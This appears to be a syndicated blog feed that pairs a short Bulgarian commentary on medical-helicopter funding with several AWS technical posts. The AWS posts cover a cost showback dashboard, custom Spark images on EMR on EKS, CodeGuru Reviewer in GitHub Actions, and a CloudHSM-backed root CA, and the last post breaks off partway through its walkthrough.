Why no one is discussing how the new medical helicopters will be funded

Post Syndicated from VassilKendov original http://kendov.com/medical_helicopter/

Why is no one discussing how the new medical helicopters, on which we plan to spend BGN 60 million, will be funded and maintained?
The most likely answer lies in the fact that we are the most corrupt country in the EU, and in the consequences that follow from that.

_______________________________________________________________
– The purchase follows a European Commission recommendation, because Bulgaria is the only EU member state without medical helicopters
– The idea is being promoted by the political party ДБ (Democratic Bulgaria), which is currently building up its profile through populist statements
– There is a total lack of expertise on the maintenance or financing of such a service, both in the government and among those promoting the idea
– Insurers are excluded from the financing process, even though, apart from the state budget, they are the most logical institution to fund such an undertaking
– The municipalities dependent on winter and summer tourism, which would be the biggest beneficiaries of such an investment, are also excluded from the process.
_________________________________________________________________

If you have a problem with a bank or a loan, request a meeting

VIP service for companies: online consultation on problem loans

The post Why no one is discussing how the new medical helicopters will be funded appeared first on Kendov.com.

The week in „Тоест“ (21–25 June)

Post Syndicated from Тоест original https://toest.bg/editorial-21-25-june-2021/

We are almost halfway through 2021. Alas, we keep moving forward in time still the poorest in the European Union, the least vaccinated, and the most willing to squint past our swamped institutions and immature democracy. According to Emilia Milcheva, however, a key cornerstone on the road to change is the number 121. That is the minimum number of parliamentary seats needed by the parties that declare ambitions to reform the state after 11…

Source

Building a Showback Dashboard for Cost Visibility with Serverless Architectures

Post Syndicated from Peter Chung original https://aws.amazon.com/blogs/architecture/building-a-showback-dashboard-for-cost-visibility-with-serverless-architectures/

Enterprises with centralized IT organizations and multiple lines of business frequently use showback or chargeback mechanisms to hold their departments accountable for their technology usage and costs. Chargeback involves actually billing a department for the cost of their division’s usage. Showback focuses on visibility to make the department more cost conscious and encourage operational efficiency.

Building a showback mechanism can be challenging for business and financial analysts of an AWS Organization. You may not have the scripting or data engineering skills needed to coordinate workflows and build reports at scale. Although you can use AWS Cost Explorer as a starting point, you may want greater customizability, larger datasets beyond a one-year period, and more of a business intelligence (BI) experience.

In this post, we discuss the benefits of building a showback dashboard using the AWS Cost and Usage Report (AWS CUR). You can track costs by cost center, business unit, or project using managed services. Using a showback strategy, you can consolidate and present costs to a business unit to show resource use over a set period of time for your entire AWS Organization. Building this solution with managed services allows you to spend time understanding your costs rather than maintaining the underlying infrastructure.

This solution highlights AWS Glue DataBrew to prepare your data into the appropriate format for dashboards. We recommend DataBrew because it provides a no-code environment for data transformation. It allows anyone to create dashboards similar to those built in the Cloud Intelligence Dashboards Workshop for your Organization.

Figure 1. QuickSight showback dashboard using CUR data transformed by Glue DataBrew and leveraging QuickSight insights

Tags for cost allocation

The success of your showback dashboard partially depends on your cost allocation tagging strategy. Typically, customers use business tags such as cost center, business unit, or project to associate AWS costs with traditional financial reporting dimensions within their organization.

The CUR supports the ability to break down AWS costs by tag. For example, if a group of resources are labeled with the same tag, you’ll be able to see the total cost and usage of that group of resources. Read more about Tagging Best Practices to develop a tagging strategy for your organization.
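As a quick illustration of the mechanics (not part of the original walkthrough), the following sketch applies business tags to an existing resource with the Resource Groups Tagging API; the ARN and tag values are placeholders. Remember that business tags only show up in the CUR after you activate them as cost allocation tags in the Billing console.

# Apply example business tags to a resource (placeholder ARN and values)
aws resourcegroupstaggingapi tag-resources \
    --resource-arn-list arn:aws:s3:::example-project-bucket \
    --tags CostCenter=1234,BusinessUnit=Marketing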

A serverless data workflow for showback dashboards

You can build showback dashboards with managed services such as Amazon QuickSight, without the need to write any code or manage any servers.

Figure 2. A serverless architecture representing data workflow

AWS automatically delivers the data you need for showback dashboards through the CUR. Once this data arrives in an Amazon Simple Storage Service (S3) bucket, you can transform the data without the need to write any code by using DataBrew. You can also automatically identify the data schema, and catalog the data’s properties to run queries using Amazon Athena. Lastly, you can visualize the results by publishing and sharing dashboards to key stakeholders within your organization using Amazon QuickSight.

The key benefits of this approach are:

  • Automatic data delivery
  • No-code data transformation
  • Automatic cataloging and querying
  • Serverless data visualization

Let’s take a look at each in more detail.

Automatic data delivery

The CUR is the source for historical cost and usage data. The CUR provides the most comprehensive set of cost and usage data available and will include your defined cost allocation tags for your entire Organization. You configure CUR to deliver your billing data to an Amazon S3 bucket at the payer account level. This will consolidate data for all linked accounts. After delivery starts, Amazon updates the CUR files at least once a day.
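If you have not set up the CUR yet, the following is a minimal sketch of creating a report definition with the AWS CLI from the payer account; the report name, bucket, and prefix are placeholders, and the parameter names reflect the cur API as documented at the time of writing. Note that the cur API endpoint is only available in the us-east-1 Region.

# Create a daily Parquet CUR delivered to an S3 bucket (placeholder names)
aws cur put-report-definition --region us-east-1 --report-definition \
    'ReportName=showback-cur,TimeUnit=DAILY,Format=Parquet,Compression=Parquet,AdditionalSchemaElements=RESOURCES,S3Bucket=example-cur-bucket,S3Prefix=cur,S3Region=us-east-1,RefreshClosedReports=true,ReportVersioning=OVERWRITE_REPORT'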

No-code data transformation

You can use DataBrew to transform the data in the Amazon S3 bucket aggregating cost and usage according to your tagging strategy. DataBrew summarizes your data for discovery. You can also run transformations called “jobs” in DataBrew without writing any code, using over 250 built-in transforms. Figures 3 through 5 show several job examples.

Figure 3. DataBrew recipe action: rename column

Figure 4. DataBrew recipe action: Create column from function

Figure 5. DataBrew recipe action: fill missing values

For a full list of columns available in CUR, review the CUR Data Dictionary. Following is a list of relevant columns for an executive summary showback dashboard:

  • bill_billing_period_start_date
  • line_item_usage_account_id
  • line_item_line_item_type
  • product_product_name
  • product_product_family
  • product_product_transfer_type
  • savings_plan_savings_plan_effective_cost
  • reservation_effective_cost
  • line_item_unblended_cost

Based on data refresh and business requirements, DataBrew can run a job on a recurring basis (for example, every 12 hours). This can be run at a particular time of day, or as defined by a valid CRON expression. This helps you automate your transformation workflows.
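For example, a minimal sketch of scheduling an existing DataBrew job every 12 hours with the AWS CLI; the job and schedule names are placeholders:

# Run the DataBrew transformation job every 12 hours
aws databrew create-schedule \
    --name cur-transform-every-12-hours \
    --job-names cur-showback-job \
    --cron-expression "cron(0 0/12 * * ? *)"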

Automatic cataloging and querying

You can use a Glue crawler to automatically classify your data to determine the data’s format, schema, and associated properties. The crawlers write metadata to an AWS Glue Data Catalog to help data users find the data they need.

With the results in Amazon S3 and the metadata in the Glue Data Catalog, you can run standard SQL queries with Athena. This helps you make more informed business decisions by tracking financial metrics and optimizing costs. Queries run directly against the data in Amazon S3, without moving the data. Using standard SQL, you can create views that aggregate cost and usage by your defined tags.
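As an illustration, the following sketch creates such a view through the Athena API; the database, table, output location, and tag column name (resource_tags_user_cost_center) are placeholders that depend on how your CUR and crawler are set up:

# Create a view that aggregates unblended cost per billing period and cost center tag
aws athena start-query-execution \
    --query-execution-context Database=cur_database \
    --result-configuration OutputLocation=s3://example-athena-results/ \
    --query-string "
        CREATE OR REPLACE VIEW showback_by_cost_center AS
        SELECT bill_billing_period_start_date,
               resource_tags_user_cost_center AS cost_center,
               SUM(line_item_unblended_cost) AS unblended_cost
        FROM cur_table
        GROUP BY 1, 2"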

Serverless data visualization

You can use Amazon QuickSight to create and share dashboards with your teams for cost visibility. QuickSight provides native integration with Athena and S3, and lets you easily create and publish interactive BI dashboards that include ML-powered insights. When building a showback dashboard such as the example in Figure 1, QuickSight authors create visuals and publish interactive dashboards.

Readers log in using your preferred authentication mechanism to view the shared dashboard. You can then filter data based on billing periods, account number, or cost allocation tags. You can also drill down to details using a web browser or mobile app.

Conclusion

In this blog, we’ve discussed designing and building a data transformation process and a showback dashboard. This gives you highly granular cost visualization without having to provision and manage any servers. You can use managed services such as AWS Glue DataBrew, Amazon Athena, and Amazon QuickSight to crawl, catalog, analyze, and visualize your data.

We recommend defining your organization’s tagging strategy so that you can view costs by tag. You can then get started by creating Cost and Usage Reports. With the data in Amazon S3, you can use the services described in this post to transform the data in the way that works for your business. Additionally, you can get started today by experimenting with the Cloud Intelligence Dashboards Workshop. This workshop provides examples of visualizations that you can build using native AWS services on top of your Cost and Usage Report. You will be able to get cost, usage, and operational insights about your AWS Cloud usage.

Customize and Package Dependencies With Your Apache Spark Applications on Amazon EMR on Amazon EKS

Post Syndicated from Channy Yun original https://aws.amazon.com/blogs/aws/customize-and-package-dependencies-with-your-apache-spark-applications-on-amazon-emr-on-amazon-eks/

Last AWS re:Invent, we announced the general availability of Amazon EMR on Amazon Elastic Kubernetes Service (Amazon EKS), a new deployment option for Amazon EMR that allows customers to automate the provisioning and management of Apache Spark on Amazon EKS.

With Amazon EMR on EKS, customers can deploy EMR applications on the same Amazon EKS cluster as other types of applications, which allows them to share resources and standardize on a single solution for operating and managing all their applications. Customers running Apache Spark on Kubernetes can migrate to EMR on EKS and take advantage of the performance-optimized runtime, integration with Amazon EMR Studio for interactive jobs, integration with Apache Airflow and AWS Step Functions for running pipelines, and Spark UI for debugging.

When customers submit jobs, EMR automatically packages the application into a container with the big data framework and provides prebuilt connectors for integrating with other AWS services. EMR then deploys the application on the EKS cluster and manages running the jobs, logging, and monitoring. If you currently run Apache Spark workloads and use Amazon EKS for other Kubernetes-based applications, you can use EMR on EKS to consolidate these on the same Amazon EKS cluster to improve resource utilization and simplify infrastructure management.

Developers who run containerized, big data analytical workloads told us they just want to point to an image and run it. Currently, EMR on EKS dynamically adds externally stored application dependencies during job submission.

Today, I am happy to announce customizable image support for Amazon EMR on EKS that allows customers to modify the Docker runtime image that runs their analytics applications using Apache Spark on their EKS clusters.

With customizable images, you can create a container that contains both your application and its dependencies, based on the performance-optimized EMR Spark runtime, using your own continuous integration (CI) pipeline. This reduces the time it takes to build the image and makes container launches more predictable for local development and testing.

Now, data engineers and platform teams can create a base image, add their corporate standard libraries, and then store it in Amazon Elastic Container Registry (Amazon ECR). Data scientists can customize the image to include their application-specific dependencies. The resulting immutable image can be scanned for vulnerabilities and deployed to test and production environments. Developers can now simply point to the customized image and run it on EMR on EKS.

Customizable Runtime Images – Getting Started
To get started with customizable images, use the AWS Command Line Interface (AWS CLI) to perform these steps:

  1. Register your EKS cluster with Amazon EMR.
  2. Download the EMR-provided base images from Amazon ECR and modify the image with your application and libraries.
  3. Publish your customized image to a Docker registry such as Amazon ECR and then submit your job while referencing your image.

You can download one of the following base images. These images contain the Spark runtime and can be used to run batch workloads using the EMR Jobs API. The following is the latest available image list.

Release Label      | Spark and Hadoop Versions                  | Base Image Tag
emr-5.32.0-latest  | Spark 2.4.7 + Hadoop 2.10.1                | emr-5.32.0-20210129
emr-5.33-latest    | Spark 2.4.7-amzn-1 + Hadoop 2.10.1-amzn-1  | emr-5.33.0-20210323
emr-6.2.0-latest   | Spark 3.0.1 + Hadoop 3.2.1                 | emr-6.2.0-20210129
emr-6.3-latest     | Spark 3.1.1-amzn-0 + Hadoop 3.2.1-amzn-3   | emr-6.3.0:latest

These base images are located in an Amazon ECR repository in each AWS Region, with an image URI that combines the ECR registry account, the AWS Region code, and the base image tag. The following example is for the US East (N. Virginia) Region:

755674844232.dkr.ecr.us-east-1.amazonaws.com/spark/emr-5.32.0-20210129

Now, sign in to the Amazon ECR repository and pull the image into your local workspace. If you want to reduce network latency, pull the image from the ECR repository in the AWS Region closest to you. In this example, I pull the image from the US West (Oregon) Region.

$ aws ecr get-login-password --region us-west-2 | docker login --username AWS --password-stdin 895885662937.dkr.ecr.us-west-2.amazonaws.com
$ docker pull 895885662937.dkr.ecr.us-west-2.amazonaws.com/spark/emr-5.32.0-20210129

Create a Dockerfile in your local workspace that uses the EMR-provided base image, and add commands to customize the image. If the application requires a custom Java SDK, or Python or R libraries, you can add them to the image directly, just as with other containerized applications.

The following example Docker commands are for a use case in which you want to install Python libraries for natural language processing (NLP), such as Spark NLP, along with pandas.

FROM 895885662937.dkr.ecr.us-west-2.amazonaws.com/spark/emr-5.32.0-20210129
USER root
### Add customizations here ####
# Install Python NLP libraries
RUN pip3 install pyspark pandas spark-nlp
USER hadoop:hadoop

In another use case, as I mentioned, you can install a different version of Java (for example, Java 11):

FROM 895885662937.dkr.ecr.us-west-2.amazonaws.com/spark/emr-5.32.0-20210129
USER root
### Add customizations here ####
# Install Java 11 and set JAVA_HOME
RUN yum install -y java-11-amazon-corretto
ENV JAVA_HOME /usr/lib/jvm/java-11-amazon-corretto.x86_64
USER hadoop:hadoop

If you’re changing Java version to 11, then you also need to change Java Virtual Machine (JVM) options for Spark. Provide the following options in applicationConfiguration when you submit jobs. You need these options because Java 11 does not support some Java 8 JVM parameters.

"applicationConfiguration": [ 
  {
    "classification": "spark-defaults",
    "properties": {
      "spark.driver.defaultJavaOptions": "-XX:OnOutOfMemoryError='kill -9 %p' -XX:MaxHeapFreeRatio=70",
      "spark.executor.defaultJavaOptions": "-verbose:gc -Xlog:gc*::time -XX:+PrintGCDetails -XX:+PrintGCDateStamps -XX:OnOutOfMemoryError='kill -9 %p' -XX:MaxHeapFreeRatio=70 -XX:+IgnoreUnrecognizedVMOptions"
    }
  }
]

To use custom images with EMR on EKS, publish your customized image and submit a Spark workload in Amazon EMR on EKS using the available Spark parameters.
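For example, the following is a minimal sketch of building and publishing the customized image to Amazon ECR; the account ID (123456789012) and repository name (emr5.32_custom) are placeholders that match the job example below:

# Build the customized image from the Dockerfile above
docker build -t emr5.32_custom .

# Create a repository (one time) and authenticate Docker to your own registry
aws ecr create-repository --repository-name emr5.32_custom --region us-west-2
aws ecr get-login-password --region us-west-2 | docker login --username AWS --password-stdin 123456789012.dkr.ecr.us-west-2.amazonaws.com

# Tag and push the image so the job can reference it
docker tag emr5.32_custom 123456789012.dkr.ecr.us-west-2.amazonaws.com/emr5.32_custom
docker push 123456789012.dkr.ecr.us-west-2.amazonaws.com/emr5.32_custom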

You can submit batch workloads using your customized Spark image. To submit batch workloads using the StartJobRun API or CLI, use the spark.kubernetes.container.image parameter.

# <base-release-label> is the base EMR release label for the custom image
$ aws emr-containers start-job-run \
    --virtual-cluster-id <enter-virtual-cluster-id> \
    --name sample-job-name \
    --execution-role-arn <enter-execution-role-arn> \
    --release-label <base-release-label> \
    --job-driver '{
        "sparkSubmitJobDriver": {
          "entryPoint": "local:///usr/lib/spark/examples/jars/spark-examples.jar",
          "entryPointArguments": ["1000"],
          "sparkSubmitParameters": "--class org.apache.spark.examples.SparkPi --conf spark.kubernetes.container.image=123456789012.dkr.ecr.us-west-2.amazonaws.com/emr5.32_custom"
        }
    }'

Use the kubectl command to confirm the job is running your custom image.

$ kubectl get pod -n <namespace> | grep "driver" | awk '{print $1}'
Example output: k8dfb78cb-a2cc-4101-8837-f28befbadc92-1618856977200-driver

Get the image for the main container in the Driver pod (Uses jq).

$ kubectl get pod/<driver-pod-name> -n <namespace> -o json | jq '.spec.containers[] | select(.name=="spark-kubernetes-driver") | .image'
Example output: 123456789012.dkr.ecr.us-west-2.amazonaws.com/emr5.32_custom

To view jobs in the Amazon EMR console, under EMR on EKS, choose Virtual clusters. From the list of virtual clusters, select the virtual cluster for which you want to view logs. On the Job runs table, select View logs to view the details of a job run.
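You can also inspect job runs from the AWS CLI; a minimal sketch, using the same placeholders as the submission command above:

# List recent job runs for the virtual cluster
$ aws emr-containers list-job-runs --virtual-cluster-id <enter-virtual-cluster-id>

# Describe a single job run, including its state
$ aws emr-containers describe-job-run \
    --virtual-cluster-id <enter-virtual-cluster-id> \
    --id <job-run-id>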

Automating Your CI Process and Workflows
You can now customize an EMR-provided base image to include your application, simplifying application development and management. With custom images, you can add the dependencies using your existing CI process, which allows you to create a single immutable image that contains the Spark application and all of its dependencies.

You can apply your existing development processes, such as vulnerability scans against your Amazon EMR image. You can also validate for correct file structure and runtime versions using the EMR validation tool, which can be run locally or integrated into your CI workflow.

The APIs for Amazon EMR on EKS are integrated with orchestration services like AWS Step Functions and AWS Managed Workflows for Apache Airflow (MWAA), allowing you to include EMR custom images in your automated workflows.

Now Available
You can now set up customizable images in all AWS Regions where Amazon EMR on EKS is available. There is no additional charge for custom images. To learn more, see the Amazon EMR on EKS Development Guide and a demo video on how to build your own images for running Spark jobs on Amazon EMR on EKS.

You can send feedback to the AWS forum for Amazon EMR or through your usual AWS support contacts.

Channy

Amazon CodeGuru Reviewer Updates: New Java Detectors and CI/CD Integration with GitHub Actions

Post Syndicated from Alex Casalboni original https://aws.amazon.com/blogs/aws/amazon_codeguru_reviewer_updates_new_java_detectors_and_cicd_integration_with_github_actions/

Amazon CodeGuru allows you to automate code reviews and improve code quality, and thanks to the new pricing model announced in April you can get started with a lower and fixed monthly rate based on the size of your repository (up to 90% less expensive). CodeGuru Reviewer helps you detect potential defects and bugs that are hard to find in your Java and Python applications, using the AWS Management Console, AWS SDKs, and AWS CLI.

Today, I’m happy to announce that CodeGuru Reviewer natively integrates with the tools that you use every day to package and deploy your code. This new CI/CD experience allows you to trigger code quality and security analysis as a step in your build process using GitHub Actions.

Although the CodeGuru Reviewer console still serves as an analysis hub for all your onboarded repositories, the new CI/CD experience allows you to integrate CodeGuru Reviewer more deeply with your favorite source code management and CI/CD tools.

And that’s not all! Today we’re also releasing 20 new security detectors for Java to help you identify even more issues related to security and AWS best practices.

A New CI/CD Experience for CodeGuru Reviewer
As a developer or development team, you push new code every day and want to identify security vulnerabilities early in the development cycle, ideally at every push. During a pull-request (PR) review, all the CodeGuru recommendations will appear as a comment, as if you had another pair of eyes on the PR. These comments include useful links to help you resolve the problem.

When you push new code or schedule a code review, recommendations will appear in the Security > Code scanning alerts tab on GitHub.

Let’s see how to integrate CodeGuru Reviewer with GitHub Actions.

First of all, create a .yml file in your repository under .github/workflows/ (or update an existing action). This file contains all of your workflow’s steps. Let’s go through the individual steps.

The first step is configuring your AWS credentials. You want to do this securely, without storing any credentials in your repository’s code, using the Configure AWS Credentials action. This action allows you to configure an IAM role that GitHub will use to interact with AWS services. This role will require a few permissions related to CodeGuru Reviewer and Amazon S3. You can attach the AmazonCodeGuruReviewerFullAccess managed policy to the action role, in addition to s3:GetObject, s3:PutObject and s3:ListBucket.

This first step will look as follows:

- name: Configure AWS Credentials
  uses: aws-actions/configure-aws-credentials@v1
  with:
    aws-access-key-id: ${{ secrets.AWS_ACCESS_KEY_ID }}
    aws-secret-access-key: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
    aws-region: eu-west-1

The access key and secret key correspond to the IAM identity that GitHub Actions uses to interact with CodeGuru Reviewer and Amazon S3.
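If the credentials belong to an IAM user, the following is a minimal sketch of granting that user the permissions described above with the AWS CLI; the user name is a placeholder, and the bucket matches the one used later in this post:

# Attach the CodeGuru Reviewer managed policy to the IAM user whose keys are stored as GitHub secrets
aws iam attach-user-policy \
    --user-name github-actions-codeguru \
    --policy-arn arn:aws:iam::aws:policy/AmazonCodeGuruReviewerFullAccess

# Grant the S3 permissions needed to upload build artifacts and analysis results
aws iam put-user-policy \
    --user-name github-actions-codeguru \
    --policy-name codeguru-reviewer-s3-access \
    --policy-document '{
      "Version": "2012-10-17",
      "Statement": [{
        "Effect": "Allow",
        "Action": ["s3:GetObject", "s3:PutObject", "s3:ListBucket"],
        "Resource": [
          "arn:aws:s3:::codeguru-reviewer-myactions-bucket",
          "arn:aws:s3:::codeguru-reviewer-myactions-bucket/*"
        ]
      }]
    }'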

Next, you add the CodeGuru Reviewer action and a final step to upload the results:

- name: Amazon CodeGuru Reviewer Scanner
  uses: aws-actions/codeguru-reviewer
  if: ${{ always() }} 
  with:
    build_path: target # build artifact(s) directory
    s3_bucket: 'codeguru-reviewer-myactions-bucket'  # S3 Bucket starting with "codeguru-reviewer-*"
- name: Upload review result
  if: ${{ always() }}
  uses: github/codeql-action/upload-sarif@v1
  with:
    sarif_file: codeguru-results.sarif.json

The CodeGuru Reviewer action requires two input parameters:

  • build_path: Where your build artifacts are in the repository.
  • s3_bucket: The name of an S3 bucket that you’ve created previously, used to upload the build artifacts and analysis results. It’s a customer-owned bucket so you have full control over access and permissions, in case you need to share its content with other systems.
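If you haven’t created the bucket yet, a one-line sketch with the AWS CLI (the name must start with codeguru-reviewer- and be globally unique; the Region is an example):

aws s3 mb s3://codeguru-reviewer-myactions-bucket --region eu-west-1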

Now, let’s put all the pieces together.

Your .yml file should look like this:

name: CodeGuru Reviewer GitHub Actions Integration
on: [pull_request, push, schedule]
jobs:
  CodeGuru-Reviewer-Actions:
    runs-on: ubuntu-latest
    steps:
      - name: Configure AWS Credentials
        uses: aws-actions/configure-aws-credentials@v1
        with:
          aws-access-key-id: ${{ secrets.AWS_ACCESS_KEY_ID }}
          aws-secret-access-key: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
          aws-region: us-east-2
      - name: Amazon CodeGuru Reviewer Scanner
        uses: aws-actions/codeguru-reviewer
        if: ${{ always() }} 
        with:
          build_path: target # build artifact(s) directory
          s3_bucket: 'codeguru-reviewer-myactions-bucket'  # S3 Bucket starting with "codeguru-reviewer-*"
      - name: Upload review result
        if: ${{ always() }}
        uses: github/codeql-action/upload-sarif@v1
        with:
          sarif_file: codeguru-results.sarif.json

It’s important to remember that the S3 bucket name needs to start with codeguru-reviewer- and that these actions can be configured to run with the pull_request, push, or schedule triggers (check out the GitHub Actions documentation for the full list of events that trigger workflows). Also keep in mind that there are minor differences in how you configure GitHub-hosted runners and self-hosted runners, mainly in the credentials configuration step. For example, if you run your GitHub Actions in a self-hosted runner that already has access to AWS credentials, such as an EC2 instance, then you don’t need to provide any credentials to this action (check out the full documentation for self-hosted runners).

Now, when you push a change or open a PR, CodeGuru Reviewer will comment on your code changes with a few recommendations.

Or you can schedule a daily or weekly repository scan and check out the recommendations in the Security > Code scanning alerts tab.

New Security Detectors for Java
In December last year, we launched the Java Security Detectors for CodeGuru Reviewer to help you find and remediate potential security issues in your Java applications. These detectors are built with machine learning and automated reasoning techniques, trained on over 100,000 Amazon and open-source code repositories, and based on the decades of expertise of the AWS Application Security (AppSec) team.

For example, some of these detectors will look at potential leaks of sensitive information or credentials through excessively verbose logging, exception handling, and storing passwords in plaintext in memory. The security detectors also help you identify several web application vulnerabilities such as command injection, weak cryptography, weak hashing, LDAP injection, path traversal, secure cookie flag, SQL injection, XPATH injection, and XSS (cross-site scripting).

The new security detectors for Java can identify security issues with the Java Servlet APIs and web frameworks such as Spring. Some of the new detectors will also help you with security best practices for AWS APIs when using services such as Amazon S3, IAM, and AWS Lambda, as well as libraries and utilities such as Apache ActiveMQ, LDAP servers, SAML parsers, and password encoders.

Available Today at No Additional Cost
The new CI/CD integration and security detectors for Java are available today at no additional cost, excluding the S3 storage, which can be estimated based on the size of your build artifacts and the frequency of code reviews. Check out the CodeGuru Reviewer Action in the GitHub Marketplace and the Amazon CodeGuru pricing page to find pricing examples based on the new pricing model we launched last month.

We’re looking forward to hearing your feedback, launching more detectors to help you identify potential issues, and integrating with even more CI/CD tools in the future.

You can learn more about the CI/CD experience and configuration in the technical documentation.

Alex

Create a portable root CA using AWS CloudHSM and ACM Private CA

Post Syndicated from J.D. Bean original https://aws.amazon.com/blogs/security/create-a-portable-root-ca-using-aws-cloudhsm-and-acm-private-ca/

With AWS Certificate Manager Private Certificate Authority (ACM Private CA) you can create private certificate authority (CA) hierarchies, including root and subordinate CAs, without the investment and maintenance costs of operating an on-premises CA.

In this post, I will explain how you can use ACM Private CA with AWS CloudHSM to operate a hybrid public key infrastructure (PKI) in which the root CA is in CloudHSM, and the subordinate CAs are in ACM Private CA. In this configuration your root CA is portable, meaning that it can be securely moved outside of the AWS Region in which it was created.

Important: This post assumes that you are familiar with the ideas of CA trust and hierarchy. The example in this post uses an advanced hybrid configuration for operating PKI.

The Challenge

The root CA private key of your CA hierarchy represents the anchor of trust for all CAs and end entities that use certificates from that hierarchy. A root CA private key generated by ACM Private CA cannot be exported or transferred to another party. You may require the flexibility to move control of your root CA in the future. Situations where you may want to move control of a root CA include cases such as a divestiture of a corporate division or a major corporate reorganization. In this post, I will describe one solution for a hybrid PKI architecture that allows you to take advantage of the availability of ACM Private CA for certificate issuance, while maintaining the flexibility offered by having direct control and portability of your root CA key. The solution I detail in this post uses CloudHSM to create a root CA key that is predominantly kept inactive, along with a signed subordinate CA that is created and managed online in ACM Private CA that you can use for regular issuing of further subordinate or end-entity certificates. In the next section, I show you how you can achieve this.

The hybrid ACM Private CA and CloudHSM solution

With AWS CloudHSM, you can create and use your own encryption keys on FIPS 140-2 Level 3 validated HSMs. CloudHSM offers you the flexibility to integrate with your applications by using standard APIs, such as PKCS#11. Most importantly for this solution, CloudHSM offers a suite of standards-compliant SDKs for you to create, export, and import keys. This makes it easy for you to securely exchange your keys with other commercially available HSMs, as long as your configurations allow it.

By using AWS CloudHSM to store and perform cryptographic operations with the root CA private key, and by using ACM Private CA to manage a first-level subordinate CA key, you maintain a fully cloud-based infrastructure while still retaining access to, and control over, your root CA key pair. You can keep the root key pair in CloudHSM, where you have the ability to escrow the keys, and only generate and use subordinate CAs in ACM Private CA. Figure 1 shows the high-level architecture of this solution.
 

Figure 1: Architecture overview of portable root CA with AWS CloudHSM and ACM Private CA

Note: The solution in this post creates the root CA and Subordinate CA 0a but does not demonstrate the steps to use Subordinate CA 0a to issue the remainder of the key hierarchy that is depicted in Figure 1.

This architecture relies on a root CA that you create and manage with AWS CloudHSM. The root CA is generally required for use in the following circumstances:

  1. When you create the PKI.
  2. When you need to replace a root CA.
  3. When you need to configure a certificate revocation list (CRL) or Online Certificate Status Protocol (OCSP).

A single direct subordinate intermediate CA is created and managed with AWS ACM Private CA, which I will refer to as the primary subordinate CA, (Subordinate CA 0a in Figure 1). A certificate signing request (CSR) for this primary subordinate CA is then provided to the CloudHSM root CA, and the signed certificate and certificate chain is then imported to ACM Private CA. The primary subordinate CA in ACM Private CA is issued with the same validity duration as the CloudHSM root CA and in day-to-day practice plays the role of a root CA, acting as the single issuer of additional subordinate CAs. These second-level subordinate CAs (Subordinate CA 0b, Subordinate CA 1b, and Subordinate CA 2b in Figure 1) must be issued with a shorter validity period than the root CA or the primary subordinate CA, and may be used as typical subordinate CAs issuing end-entity certificates or further subordinate CAs as appropriate.

The root CA private key that is stored in CloudHSM can be exported to other commercially-available HSMs through a secure key export process if required, or can be taken offline. The CloudHSM cluster can be shut down, and the root CA private key can be securely retained in a CloudHSM backup. In the event that the root CA must be used, a CloudHSM cluster can be provisioned on demand, and the backup restored temporarily.

Prerequisites

To follow this walkthrough, you need to have the following in place:

Process

In this post, you will create an ACM Private CA subordinate CA that is chained to a root CA that is created and managed with AWS CloudHSM. The high-level steps are as follows:

  1. Create a root CA with AWS CloudHSM
  2. Create a subordinate CA in ACM Private CA
  3. Sign your subordinate CA with your root CA
  4. Import the signed subordinate CA certificate in ACM Private CA
  5. Remove any unused CloudHSM resources to reduce cost

To create a root CA with AWS CloudHSM

  1. To install the AWS CloudHSM dynamic engine for OpenSSL on Amazon Linux 2, open a terminal on your Amazon Linux 2 EC2 instance and enter the following commands:
    wget https://s3.amazonaws.com/cloudhsmv2-software/CloudHsmClient/EL7/cloudhsm-client-dyn-latest.el7.x86_64.rpm
    
    sudo yum install -y ./cloudhsm-client-dyn-latest.el7.x86_64.rpm
    

  2. To set an environment variable that contains your CU credentials, enter the following command, replacing USER and PASSWORD with your own information:
    export n3fips_password=USER:PASSWORD
    

  3. To generate a private key using the AWS CloudHSM dynamic engine for OpenSSL, enter the following command:
    openssl genrsa -engine cloudhsm -out Root_CA_FAKE_PEM.key
    

    Note: This process exports a fake PEM private key from the HSM and saves it to a file. This file contains a reference to the private key that is stored on the HSM; it doesn’t contain the actual private key. You can use this fake PEM private key file and the AWS CloudHSM engine for OpenSSL to perform CA operations using the referenced private key within the HSM.

  4. To generate a CSR for your certificate using the AWS CloudHSM dynamic engine for OpenSSL, enter the following command:
    openssl req -engine cloudhsm -new -key Root_CA_FAKE_PEM.key -out Root_CA.csr
    

  5. When prompted, enter your values for Country Name, State or Province Name, Locality Name, Organization Name, Organizational Unit Name, and Common Name. For the purposes of this walkthrough, you can leave the other fields blank.

    Figure 2 shows an example result of running the command.
     

     Figure 2: An example certificate signing request for your private key using AWS CloudHSM dynamic engine for OpenSSL

  6. To sign your root CA with its own private key using the AWS CloudHSM dynamic engine for OpenSSL, enter the following command:
    openssl x509 -engine cloudhsm -req -days 3650 -in Root_CA.csr -signkey Root_CA_FAKE_PEM.key -out Root_CA.crt
    

To create a subordinate CA in ACM Private CA

  1. To create a CA configuration file for your subordinate CA, open a terminal on your Amazon Linux 2 EC2 instance and enter the following command. Replace each user input placeholder with your own information.
    echo '{
      "KeyAlgorithm": "RSA_2048",
      "SigningAlgorithm": "SHA256WITHRSA",
      "Subject": {
        "Country": "US",
        "Organization": "Example Corp",
        "OrganizationalUnit": "Sales",
        "State": "WA",
        "Locality": "Seattle",
        "CommonName": "www.example.com"
      }
    }' > ca_config.txt
    

  2. To create a sample subordinate CA, enter the following command:
    aws acm-pca create-certificate-authority --certificate-authority-configuration file://ca_config.txt --certificate-authority-type "SUBORDINATE" --tags Key=Name,Value=MyPrivateSubordinateCA
    

    Figure 3 shows a sample successful result of this command.
     

    Figure 3: A sample response from the acm-pca create-certificate-authority command.

For more information about how to create a CA in ACM Private CA and additional configuration options, see Procedures for Creating a CA in the ACM Private CA User Guide, and the acm-pca create-certificate-authority command in the AWS CLI Command Reference.

To sign the subordinate CA with the root CA

  1. To retrieve the certificate signing request (CSR) for your subordinate CA, open a terminal on your Amazon Linux 2 EC2 instance and enter the following command. Replace each user input placeholder with your own information.
    aws acm-pca get-certificate-authority-csr --certificate-authority-arn arn:aws:acm-pca:region:account:certificate-authority/12345678-1234-1234-1234-123456789012 > IntermediateCA.csr
    

  2. For demonstration purposes, you can create a sample CA config file by entering the following command:
    cat > ext.conf << EOF
    subjectKeyIdentifier = hash
    authorityKeyIdentifier = keyid,issuer
    basicConstraints = critical, CA:true
    keyUsage = critical, digitalSignature, cRLSign, keyCertSign
    EOF
    

    When you are ready to implement the solution in this post, you will need to create a root CA configuration file for signing the CSR for your subordinate CA. Details of your X.509 infrastructure, and the CA hierarchy within it, are beyond the scope of this post.

